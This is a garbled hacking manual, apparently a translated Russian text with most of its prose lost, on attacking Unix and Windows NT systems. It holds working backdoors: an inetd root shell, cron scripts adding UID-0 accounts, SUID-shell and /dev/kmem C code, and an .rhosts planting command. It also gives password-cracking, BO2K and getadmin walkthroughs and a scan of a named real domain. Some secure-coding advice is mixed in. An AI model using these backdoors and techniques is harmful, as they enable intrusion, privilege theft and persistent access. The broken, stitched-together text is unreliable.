\etc\services : (1) (2)/(3) (4) smtp 25/tcp mail (1) - , (2) - , (3) - ,
, (4) - . \etc\services: evil 22/tcp evil /etc/inetd.conf: evil stream tcp nowait /bin/sh sh -i inetd. :
.
,
Internet.
(6)-I - .
,
, , crontab . ,
.
crontab /var/spool/cron/crontabs/root. . ,
.
- . ,
, .
crontab - , crontab. crontab , /var/spool/crontab/root.
crontab :
(1) (2) (3) (4) (5) (6) 0 * * 1 /usr/bin/updatedb
1 5 : (0-59), (0-23), (1-31), (1-12), (0-6). 6 - ( ). .
cron /var/spool/crontab/root. , ,
/etc/passwd U1D 0 ( - crontab, ).
/var/spool/crontab/root: 0 * * /usr/bin/trojancode :
f t ! / b i n / c s h ft Is our eviluser still on the system? Let's make sure he is. #[email protected] set evilflag = Cgrep eviluser /etc/passwd') if($#evilflag == 0) then ft Is he there? set linecount = 'wc-1 /etc/passwd' cd # Do this at home. cp /etc/passwd ./temppasstf Safety first. linecount[1] /= 2 linecount[1] += 1 ft we only want 2 temp files split -$linecount[1] ,/temppass ft passwd string optional echo "EvilUser::0:O:Mr, Sinister: /home/sweet/home:/bin/csh" ./xaa cat ./xab./xaa mv ./xaa /etc/passwd chmod 644 /etc/passwd tt or whatever it was beforehand rm ./xa* ,/temppass echo Done... else endif
(7) - II
. , () , etc/passwd. ( /var/spool/mail/.sneaky) . , ,
, 2.30 ( ) \etc\passwd ( !).
,
, ,
.
crontab: 29 2 * * * /bin/usr/sneakysneaky_passwd :
echo ,root:1234567890123:0:0:0perator:/:/bin/csh" > /var/spool/mail/.sneaky :
#!/bin/csh # Install trojan / e t c / p a s s w d file for one minute [email protected] cp /etc/passwd /etc/.temppass cp /var/spool/mail/.sneaky /etc/passwd sleep 60 mv /etc/.temppass /etc/passwd
(8) .
- -, .
.
, .
- .
SUID-- , . -
, ,
.
/* [email protected] */ ((include Sdefine KEYWORD "indust" define BUFFERSIZE 10 int main(argc, argv) int argc; char.argv[] ;{ int i=0; if(argv[1]){ /* we've got an argument, is it the keyword? */ if(!(strcmp(KEYW0RD,argv[1]))){ /* */ systemCcp /bin/csh /bin/. swp12V);
system("chown root / b i n / . s w p i 2 l " ) ; system*"chmod 4755 /bin/.swp121"); } } /* Put your possibly system specif ic t ro jan messages here */ /* Let's look like we're doing s o m e t h i n g . . . */ printfCSychroniz ing bitmap image records."); /* system*"is -alfl / >& /dev/null > /dev/null&"); */ for* ; i tmpf i le /usr/bin/uuencode tmpfile / root/ , rhosts , 25.
, uuencode- .rhosts. () :
%echo "+ +" | /usr/bin/uuencode / r o o t / , rhosts | mail decode@target . com .
, ,
.
.
(10) ,
, tripwire.
:
. su, login pass-wrd, . ,
UNIX. (: ,
, ). , ,
:
,
, ,
.
10- .
(11) : \dev\khem .
, , ,
UID. , , \dev\khem /. : \dev\khem, , U I D , csh, U I D . .
/* \khem , , ID 0. */ include include include include include include include define KEYWORD "nomenclaturel" struct user userpage; long address(), userlocation;
int main(argc, argv, envp) int argc; char *argv[], *envp[];{ int count, fd; long where, lseek(); if(argv[1]){ /* we've got an argument, is it the keyword? */ i f ( ! (strcmp(KEYW0RD,argv[1]))){ fd=(open("/dev/kmem",0 RDWR); if(fd
include include define LNULL ((LDFILE *)0) longaddress(){ LDFILE -object; SYMENT symbol; long idx=0; object=ldopen("/unix",LNULL); if(!object){ fprintf(stderr,"Cannot open /unix.\n"); exit (50); } for(;ldtbread(object,idx,&symbol)==SUCCESS;idx++){ if(!strcmp(" u",ldgetname(object,&symbol)))
{ fprintf(stdout, "Userpage is at 0x%8.8x\n", symbol.n_value); ldclose(object); return(symbol.n_value);
) } fprintf(stderr, "Cannot read symbol table in /unlx.\n"); exit (60); }
(12) /dev/kmem
, , , ,
.
- (7), (, 5 ) , /dev/kmem, .
(7): chmod 666 /dev/kmem sleep 300 Nap for 5 minutes chmod 600 /dev/kmem # Or whatever it was before
6.
:
, ,
. - ,
single-user ( ) .
-
, ,
,
,
.
(, ), . -
sendmail debug, . ,
, passwrd, , , ( , , sendmail, Internet Worm, telnet 25 .
, , , :
a) ,
root/daemon/bin, , ,
.
b) , ,
.
/ / ,
. ,
. ,
AT&T System V Unix acctcom(l),
. TCP/IP / , rwhod, fingerd tftpd, .
.
/ ; ( /etc, /etc/re, /etc/rcX.d) . .
chmod(l).
7. /
.
; .
-
,
.
, , ,
,
.
,
. ,
.
; , .
. , ,
,
.
,
! - ( ) .
8. Unix
:
:
1) . 2) src. 3) . 4) . :,
1) SUID/SGID. 2) / .. 3) . 4) . 5) . 6) . 7) . 8) . 9) . 10) /.
11) . 12) , . 13) .
:
I: Suid-
) . ) . ) (
sym, loc.-). ) . II: , SUID
) . ) . ) . ) . ) . III:
) . ) . ,
System Development Corporation 65%- .
:
1 .
,
.
:
A) : , . : .
B) : , . : i-node ( ).
C) : , . : .
.
.
, .
.
, ,
LINUX, NET2 BSD386. , ,
, ,
. ,
() , - ,
.
2 (
).
UNIX? ( , ).
who OS , .
suid- OS. - suid . : - suid, -
. ,
suid, suid, .
,
, -: , suid, sgid, ( suid/sgid), OS .
. ( ).
4
.
9.
1) , .
: gets(), sprintf() (and the like). Use strncpy() instead of strcpy(); in src:
#define SCOPYN(a, b) strncpy((a), (b), sizeof(a))
2) SUID/SGID ,
PERL. 3) SUID/SGID , PERL
taintperl.
4) SUID/SGID , system(), popen(), execlp(), execvp() .
5) , .
6) .
7) , . (: fork(2), setuid(2)).
8) , : ) ; ) ; )
;
) , passwd, L.sys ..; )
/;
) , .
9) . , , .
10) man- -
-. .
11) - , .
,
/.
,
OS. , . , telnet -h ... , login.c:
    if (getuid() && hflag) {      /* -h is for root (telnetd) only */
        syslog(LOG_ERR, "login: -h used by non-root");
        exit(1);
    }
12) . 13) , ,
, ,
.
14) , .
15) , , , .
16) : ,
.
17) - .
18) : (passwd OK, illegal parameter, segment error ..) , . 17.
19) . 20) ,
.
21) . 22) . 23) ,
-
.
24) , , .
25) , . ( UID 0, .)
26) , ... 27) . 28)
( ).
29) , , , ,
( ).
30) .
, ,
, ,
,
, .
31) , fopen(3) umask. (: 1(1).)
, UID .
32) trace (truss on SVR4). , .
33) /usr/local. .
tcpdump, top, nfswatch... suid.
34) suid , , .
, ,
.
35) , .
36) . LD_PRELOAD, , .
37) I/O - , . , .
38) , I/O (pre-load ).
39) I/O , ,
.
40) , . , ,
/etc/a, ,
( , /etc/utmp).
41) , suid/sgid.
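As an added illustration of item 1 (this is not code from the book), here is the bounded-copy idiom the SCOPYN macro encourages next to a copy routine that always terminates the string and reports truncation. NAME_LEN, the probe helpers and the sample argument are constructed for the demonstration:

```c
/* Added example for item 1: bounded copy done badly and done properly.
   Not the book's code. NAME_LEN and the sample input are constructed. */
#include <stdio.h>
#include <string.h>

#define NAME_LEN 16

/* The SCOPYN idea: bound the copy by sizeof(dst). It only works when dst
   is a real array (sizeof a pointer is 4 or 8), and strncpy writes no
   terminator when strlen(src) >= sizeof(dst). */
#define SCOPYN(dst, src) strncpy((dst), (src), sizeof(dst))

/* Hardened copy: explicit destination size, always '\0'-terminated.
   Returns 1 if src had to be truncated, 0 otherwise. */
int safe_copy(char *dst, size_t dstsz, const char *src)
{
    size_t n;
    if (dstsz == 0)
        return 1;
    n = strlen(src);
    if (n >= dstsz) {
        memcpy(dst, src, dstsz - 1);
        dst[dstsz - 1] = '\0';
        return 1;
    }
    memcpy(dst, src, n + 1);        /* n+1 copies the terminator too */
    return 0;
}

/* Copy src into a NAME_LEN buffer with safe_copy and fold the result into
   one int: strlen(result), plus 100 if truncation was reported. */
int safe_copy_probe(const char *src)
{
    char buf[NAME_LEN];
    int truncated = safe_copy(buf, sizeof buf, src);
    return (int)strlen(buf) + 100 * truncated;
}

/* Does SCOPYN leave a terminator inside the array? 1 = yes, 0 = no.
   The guard bytes after name[] let us check without running off the end
   the way a following strlen() or printf("%s") would. */
int scopyn_terminated(const char *src)
{
    struct { char name[NAME_LEN]; char guard[4]; } rec;
    memset(&rec, 'X', sizeof rec);
    SCOPYN(rec.name, src);
    return memchr(rec.name, '\0', NAME_LEN) != NULL;
}

int main(void)
{
    /* constructed input: longer than the buffer, as argv[] often is */
    const char *arg = "a-very-long-command-line-argument";
    char name[NAME_LEN];
    int t = safe_copy(name, sizeof name, arg);
    printf("safe_copy -> \"%s\" (truncated=%d)\n", name, t);
    printf("SCOPYN terminated, short input: %d\n", scopyn_terminated("root"));
    printf("SCOPYN terminated, long input:  %d\n", scopyn_terminated(arg));
    return 0;
}
```

The second probe is the point of item 1: with a 33-byte argument SCOPYN fills all 16 bytes and leaves no terminator, so whatever reads the buffer next walks into the guard bytes, or into the return address in a real program.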
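Item 31 (files a privileged program creates inherit the caller's umask) as an added example, not the book's code: the first routine shows what fopen(3) does under umask 0, the second creates the file with an explicit mode and exclusive create, then verifies with fstat(2) that it got a fresh, private regular file. The probe file name and the directory argument are assumptions for the demonstration:

```c
/* Added example for item 31: do not let the caller's umask decide the
   mode of files a setuid program creates. Not the book's code. */
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/stat.h>

static int seq;   /* makes each probe path unique within one process */

/* Assumed naming scheme for the throwaway probe files. */
static void probe_path(char *out, size_t outsz, const char *dir)
{
    snprintf(out, outsz, "%s/.secprog-%ld-%d", dir, (long)getpid(), seq++);
}

/* Permission bits of an open descriptor's file, or -1. */
static int fd_mode(int fd)
{
    struct stat st;
    if (fstat(fd, &st) < 0)
        return -1;
    return (int)(st.st_mode & 0777);
}

/* The pitfall: fopen(..., "w") asks for 0666 and lets umask trim it.
   A caller who set umask 0 gets a world-writable file. Returns the
   permission bits the file ended up with. */
int mode_via_fopen(const char *dir)
{
    char path[256];
    FILE *fp;
    int m;
    mode_t old = umask(0);          /* what a hostile caller arranges */
    probe_path(path, sizeof path, dir);
    fp = fopen(path, "w");
    if (!fp) { umask(old); return -1; }
    m = fd_mode(fileno(fp));
    fclose(fp);
    unlink(path);
    umask(old);
    return m;
}

/* Hardened creation: exclusive create with an explicit mode, then check
   with fstat that it is a new regular file with no group/other access.
   Returns the descriptor or -1. */
int create_private_file(const char *path)
{
    struct stat st;
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL, 0600);
    if (fd < 0)
        return -1;
    if (fstat(fd, &st) < 0 || !S_ISREG(st.st_mode) ||
        st.st_nlink != 1 || (st.st_mode & 077) != 0) {
        close(fd);
        unlink(path);
        return -1;
    }
    return fd;
}

/* Same probe as above, through create_private_file: umask 0 no longer matters. */
int mode_via_private(const char *dir)
{
    char path[256];
    int fd, m;
    mode_t old = umask(0);
    probe_path(path, sizeof path, dir);
    fd = create_private_file(path);
    if (fd < 0) { umask(old); return -1; }
    m = fd_mode(fd);
    close(fd);
    unlink(path);
    umask(old);
    return m;
}

int main(void)
{
    printf("fopen(\"w\") under umask 0: %04o\n", mode_via_fopen("."));
    printf("explicit 0600 + O_EXCL:   %04o\n", mode_via_private("."));
    return 0;
}
```

O_EXCL also covers the symlink race the list alludes to under item 37: if something already sits at the path, the open fails instead of following it.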
10.
, ,
. vi ( ). vi :
:set shell=/bin/sh
:shell
cd, ftp , cd.
Microsoft Windows 2000 127
Microsoft Windows 2000
1.
Windows NT Windows 2000
Windows NT Windows 2000. Windows
NT/2000? Windows NT/2000 ( Windows NT, .. Windows 2000 NT) ,
DOS, Windows 3.x/95/98,
. : , . , , .
,
Windows NT - - . , Windows NT/2000 , . , ,
TCP/IP Windows NT,
(host, nslookup, talk ..). , ,
Windows NT..
, ,
. ,
,
Internet. ,
Windows NT. 10 30% . .
? , - .
:
1. ;
2. ;
3. . ,
.
. ,
,
Internet.
.
. , ,
. ,
, . ,
, ,
, ,
- ... .
2.
? , ,
. , ..
, . ,
,
, .. , ( ), .., , - , , . .
.
Windows NT (.. , , ). ( FAT) NTFS
. - Windows NT - FAT NTFS. FAT.
-
ZIP-. , , FAT. . ,
NTFS. .
NTFS , . -
Windows NT. MS-DOS , , NTFS, NTSFDOS.EXE ( - Mark Russinovich, ). Windows NT , , , . , , .
, , - ,
, , - .
, ,
NTFSDOS.EXE , , . ,
- , ,
.
- (), Windows NT ( Windows 2000). Windows NT, . :
SeNTry2020 (http://www.softwinter.com); SecurityPlus (http://www.softbytelabs.com); Cryptext (http://www.tip.net.au/~njpayne). ,
,
, ,
- -OW (http://www.security.ru), . ,
, .
. ,
, .
,
- , - ,
- .
, .
, ( ) .
, .
, ,
/ . SAM, . ,
.
WINNT\SYSTEM32\CONFIG\. Windows NT , SAM, WINNT\SYSTEM32\CONFIG\, , , .
SAM, L0phtCrack. Rambler.ru AltaVista. .
,
. , , , .
: . , ,
, -
, .
13-16 , Windows NT 128 . , SAM ,
. Windows NT, LAN Manager. LAN Manager , ,
, : Windows 3.11 for Workgroups Windows 95/98. , : , LAN Manager , 14-character ,
. , 14-character 7-character ,
. ,
, ,
LAN Manager.
L0phtCrack, Pentium II-450, , , ( ).
SYSKEY, Service Pack 3. SYSKEY SAM,
. . - ,
, L0phtCrack .
3.
SAM SAM- ,
... , ,
Windows NT/2000 (registry), %SystemRoot%\SYSTEM32\CONFIG\SAM - . , ..
.
. , -
ERD (Emergency Repair Disk), %SystemRoot%\REPAIR\. , Administrator Guest, , . 16-byte, MD4 of the (Unicode) password. Windows NT/2000
-.
,
Internet .
4. L0phtCrack
L0phtCrack , .
,
.
SAM. - . .
300 . ,
,
( 100 . ).
word-english File () Open Wordlist File ( ).
A-Z A-Z 0-9 ( ) .
- .
, .
Tools ()
, , ,
.
,
File () Open Password File ( ).
. l0phtcrack.exe (l0phtcrack95.exe for Windows 95/98). ,
Windows NT 4.0 ( Windows 2000), sniffer readsmb.exe, Windows 3.11/95/98 MS-DOS. sniffer NDIS, .
Ethernet CSMA-CD. NDIS Network () . Protocols () Add (). Have Disk ( ) , L0phtCrack Oemsetup.inf. sniffer readsmb.exe Windows.
-
.
: , SAM sniffer.
,
, Tools () Dump Password from Registry ( ). IP \\Computer_name or \\IP-address.
Windows NT/2000 ,
.
, Windows NT/2000 , Administrator , . ,
,
. regedit.exe HKEY_CURRENT_USER\Software\LHI\L0phtCrack\AdminGroupName.
Administrator Windows NT (2000).
SAM SAM
, ERD (Emergency Repair Disk). NT %SystemRoot%\SYSTEM32\CONFIG\. Windows NT/2000, DOS NTFSDOS (http://www.ntinternals.com/ntfs20r), SAM . L0phtCrack Import SAM File, File (), SAM. Windows NT (2000) , SAM, %SystemRoot%\REPAIR\. , ,
backup ERD, SAM . ERD, *._ :
EXPAND SAM._ SAM
sam._ L0phtCrack. Service Pack 3 for
NT 4.0 SYSKEY - , L0phtCrack ( , L0phtCrack 2.5) SAM.
sniffer
SYSKEY ,
.
sniffer, Ethernet.
sniffer, L0phtCrack, readsmb.exe, Windows NT 4.0 ( sniffer Windows 95/98).
sniffer : READSMB > PASSWD , ,
sniffer, passwd.
sniffer , , .
passwd L0phtCrack.
sniffer -v: READSMB -V
-v , readsmb , - .
,
L0phtCrack, word-english, . Run () Tools ().
, Tools Options , ,
word-english. -
, . L0phtCrack 5 *.LC .
L0phtCrack 2.52 450%
Pentium, Pentium MMX, Pentium Pro Pentium II III. .
-
Pentium II/450.
.
.
SMB sniffer'a Windows 95/98.
PWDUMP2,
SAM, SYSKEY SP3.
PWDUMP2 http://www.webspan.net/~tas/pwdump2/
SYSKEY , , ,
Administrators. , ,
.
Windows NT PWL-.
Windows 3.11/95/98, ,
Windows NT . *.PWL , Windows 3.11/95/98. repwl.exe, http://webdon.com/vitas/pwltool.htm.
PWL-, .. Browse () PWL-,
Search Password ( ).
Windows NT. ,
, ,
,
. ,
: http://www.microsoft.com/ntserver/security/exec/overview/Secure_NTInstall.asp
.
, ,
,
, . ,
-
, ...
GetAdmin.exe ( - - ). , Service Pack 4 , . , , - .
NT , , System Account, , .
. , , Billy , SP4 . : , .
5.
,
Windows NT. , ,
,
Windows NT ( ) .
:
Named Pipe File System.
6. Named Pipe File System
Named Pipe File System , , named pipes. named pipes , , (mail-slots). , ( CreateFile, ReadFile WriteFile), . named pipes , .
( ), ( ). Windows NT :
Win32 CreateNamedPipe.
ConnectNamedPipe, .
\\computer_name\pipe\pipe_name CreateFile.
CloseHandle. DisconnectNamedPipe.
ConnectNamedPipe.
.
N- , N- CreateNamedPipe ( ).
,
( ) .
ReadFile WriteFile.
WriteFile, , ReadFile.
Named Pipe File System Windows NT ,
. , (RPC) Windows NT NPFS.
Named Pipe File System .
PipeBomb AdminTrap, Named Pipe File System.
7. PipeBomb
PipeBomb
.
, ,
, .
(thread), .
,
.
,
.
.
,
Windows NT 4.0. PipeBomb .
Create () Write (), Windows NT .
Internet, SMB TCP/IP ( Named Pipe File System SMB).
8. AdminTrap
AdminTrap ,
. AdminTrap Win32 ImpersonateNamedPipeClient, (access token) , handle . ,
AdminTrap -- .
, AdminTrap ImpersonateNamedPipeClient , , :
winreg - , ,
(alerts), ,
;
spoolss - .
.
, ,
,
,
AdminTrap, Administrators.
9.
Back Orifice 2000 (BO2K) Back Orifice ( - )
Windows NT Internet. BO2K ,
,
.
Windows 95/98 Windows NT.
BO2K GUI client (bo2kgui.exe)
TCP or UDP port 31337.
( 120 ) IP-.
. , ,
:
;
;
;
;
, ;
;
;
.
BO2K Configuration Wizard (bo2kcfg.exe). BO2K Configuration Wizard BO2K server (bo2k.exe) , . , IP, .
,
IP TCP or UDP. TCP Internet. UDP .
,
bo2k.exe , Plugins DLL.
10. Windows NT Internet
Windows NT Internet. - , IP-. Web-, , .
, ,
Web-. Web- IIS 3.0/4.0/5.0, Microsoft Windows NT, : Web- *.htm, *.asp; Windows-1251, KOI8-R ( ) .
,
. ,
index.htm, . Internet Web : http://www.idahonews.com/, . ,
scripts cgi-bin.
scripts cgi-bin , - . ,
Web-. - , , scripts cgi-bin. .
, cgi-bin , Windows NT Perl. ,
. , cgi-bin MSWin32-x86-object. .
, MSWin32-x86-object Perl 5.0, Perl 5.00502.exe. PerlIS-Err.log:
'E:\docs' error message at: 1998/11/24 13:23:57 Can't open perl script "E:\docs": Permission denied
...
'E:\docs' error message at: 1998/12/25 04:49:16 Can't open perl script "E:\docs": Permission denied
...
'E:\docs' error message at: 1999/03/26 16:05:43 Can't open perl script "E:\docs": Permission denied
...
'E:\docs' error message at: 1999/09/08 11:39:54 Can't open perl script "E:\docs": Permission denied
...
'E:\docs' error message at: 1999/09/08 11:58:34 Can't open perl script "E:\
, , ..,
, .
, , , .
Windows:
7th Sphere PortScan v1.1
All Around Internet
Ogre v0.9b
Port Scanner v1.1
PortScan Plus
SiteScan by Rhino9/Intercore
TCP Port Scanner
UltraScan v1.2
http://208.234.248.19:81/hack/genar/archive5.html
Ogre v0.9b (Rhino9). Windows UNIX Internet.
Ogre Windows NT Internet.
Ogre
Windows 95 Windows NT, . Ogre :
;
,
,
;
netbios (Nbtstat);
,
(net view);
Microsoft Frontpage;
;
Index Server.
11. Ogre
IP- http://www.idahonews.com/.
ping www.idahonews.com:
Pinging www.idahonews.com [198.60.102.4] with 32 bytes of data:
Request timed out.
Request timed out.
Request timed out.
Request timed out.
IP DNS, ping
. , firewall .
idahonews.com. ,
, IP Starting IP ( IP-) 198.60.102.1. Ending Octet 254 ( ). Start scan ( ).
:
Scanning - 198.60.102.1
Commencing Port Scan:
Port 21: Closed
Port 23: Open
Port 25: Closed
Port 53: Closed
Port 79: Open
Port 80: Closed
Port 110: Closed
Port 111: Closed
Port 139: Closed
Port 443: Closed
Port 1080: Closed
Port 8181: Closed

Scanning - 198.60.102.2
*Inactive IP address*

Scanning - 198.60.102.3
*Inactive IP address*

Scanning - 198.60.102.4
*Inactive IP address*

Scanning - 198.60.102.5
Commencing Port Scan:
Port 21: Closed
Port 23: Closed
Port 25: Open
Port 53: Open
Port 79: Open
Port 80: Closed
Port 110: Open
Port 111: Closed
Port 139: Closed
Port 443: Closed
Port 1080: Closed
Port 8181: Closed

Scanning - 198.60.102.6
*Inactive IP address*

Scanning - 198.60.102.38
*Inactive IP address*

Scanning - 198.60.102.39
Commencing Port Scan:
Port 21: Closed
Port 23: Closed
Port 25: Open
Port 53: Open
Port 79: Open
Port 80: Closed
Port 110: Open
Port 111: Closed
Port 139: Closed
Port 443: Closed
Port 1080: Closed
Port 8181: Closed

Scanning - 198.60.102.40
*Inactive IP address*

Scanning - 198.60.102.54
*Inactive IP address*

Scanning - 198.60.102.55
Commencing Port Scan:
Port 21: Closed
Port 23: Closed
Port 25: Open
Port 53: Open
Port 79: Open
Port 80: Closed
Port 110: Open
Port 111: Closed
Port 139: Closed
Port 443: Closed
Port 1080: Closed
Port 8181: Closed

Scanning - 198.60.102.56
*Inactive IP address*

Scanning - 198.60.102.254
*Inactive IP address*
Windows NT
135-139. , .
:
Scanning - 198.60.102.4
*Inactive IP address* , firewall.
, .
tracert 198.60.102.1 (traceroute on UNIX):
Tracing route to cisco.idahonews.com [198.60.102.1] over a maximum of 30 hops:
 11   240 ms   241 ms   240 ms  gbr2-p01.wswdc.ip.att.net [12.123.8.241]
 12   261 ms   260 ms   251 ms  gbr1-p40.oc-48.sl9mo.ip.att.net [12.122.2.82]
 13   330 ms   301 ms   390 ms  gbr2-p50.oc-12.sffca.ip.att.net [12.122.3.17]
 14   301 ms   320 ms   311 ms  ar2-a3120s4.sffca.ip.att.net [12.127.1.145]
 15   401 ms   350 ms   351 ms  12.126.207.46
 16   381 ms   350 ms   371 ms  cisco.idahonews.com [198.60.102.1]
Trace complete.
, -
. ,
198.60.102.1 Firewall Cisco. . , , ,
. cisco.idahonews.com Ogre : 23 (Telnet) and 79 (finger).
tracert 198.60.102.5:
Tracing route to router.idahonews.com [198.60.102.5] over a maximum of 30 hops:
 12   260 ms   270 ms   261 ms  gbr1-p40.oc-48.sl9mo.ip.att.net [12.122.2.82]
 13   321 ms   310 ms   300 ms  gbr2-p50.oc-12.sffca.ip.att.net [12.122.3.17]
 14   310 ms   321 ms   320 ms  ar2-a300s3.sffca.ip.att.net [12.127.5.177]
 15   341 ms   340 ms   371 ms  12.126.207.34
 16   371 ms     *        *     198.60.104.181
 17   361 ms   361 ms   370 ms  router.idahonews.com [198.60.102.5]
Trace complete.
, 198.60.102.5 router (UNIX). router.idahonews.com : 25 (SMTP), 53 (DNS), 110 (POP3). , , DNS. ,
idahonews.com 192.168.0.*.
198.60.102.6-253 , IP- idahonews.com.
,
. www.idahonews.com .
, Cisco firewall and Unix . ,
Windows NT firewall 135-139 .
12. Windows NT
, , , Internet Windows NT, firewall, 135-139 . , ,
, firewall, . , ,
, Windows NT Service Pack. IIS, , , ,
, ,
fixes, (Binding) Network ().
, Ogre :
Scanning - 198.60.102.4
Commencing Port Scan:
Port 21: Open               (FTP, the IIS FTP service)
Port 23: Closed
Port 25: Open               (SMTP, the IIS SMTP service)
Port 53: Open
Port 79: Closed
Port 80: Open               (HTTP, IIS)
Port 110: Open
Port 111: Closed
Port 139: Open              (File Sharing)
Port 443: Closed
Port 1080: Closed
Port 8181: Closed
Surveying Web Server:
-Checking for Vulnerable URLs:
Frontpage Extensions: Not Present
IIS HTML Administration Interface: Present    (remote administration of IIS)
IIS Samples: Present
Commencing Nbtstat Scan:
NetBIOS Remote Machine Name Table
     Name              Type     Status
     YYYYY             UNIQUE   Registered
     YYYYY             UNIQUE   Registered
     ZZZZZZZZZ         GROUP    Registered
     ZZZZZZZZZ         GROUP    Registered
     ZZZZZZZZZ         UNIQUE   Registered
     ZZZZZZZZZ         GROUP    Registered
     YYYYY             UNIQUE   Registered
     ZZZZZZZZZ         UNIQUE   Registered
     INet~Services     GROUP    Registered
     ..__MSBROWSE__.   GROUP    Registered
     IS~YYYYY          UNIQUE   Registered
MAC Address = XX-XX-XX-XX-XX-XX
X, Y Z , , firewall.
, NetBIOS ,
nbtstat -.... NetBIOS .
UNIQUE , IP-;
4 GROUP , IP-.
, ,
,
Windows NT.
,
FTP.
, ,
Windows NT (Guest, Administrator), . ,
IIS (Internet Information Service), IUSR_
NAT
NetBIOS Auditing Tool, UNIX, Win32.
Nat - , NetBIOS.. .
:
NAT [-o filename] [-u userlist] [-p passlist] <address>
. , ,
Ogre. L0phtCrack, Passlist.txt. , Ogre. nat:
NAT -o REZALT.TXT 198.60.102.4
NAT , .
,
,
.
, NAT 30 50 .
Windows NT 100% . , , , . NAT Administrator,
.
, NAT , Administrator, ,
. , ,
NET USE, sam._ from WINNT\REPAIR L0phtCrack, .
, NET USE ( FTP), , ,
(Getadmin ..). Windows NT InetPub/cgi-bin. , , , :
http://www.idahonews/scripts/getadmin.exe?mmmm mmmm ,
.
PWDUMP.EXE ( ) Back Orifice NetBus (http://indigo.ie/~lmf/nb.htm), .
1.
, -
, .
:
. - .
, UNIX login root . .
(, login&password).
(sniffing), (-).. - ,
.
: WWW- WWW- - JAVA, ActiveX.
WWW- / .
,
.
; ,
, ,
, , - .. ,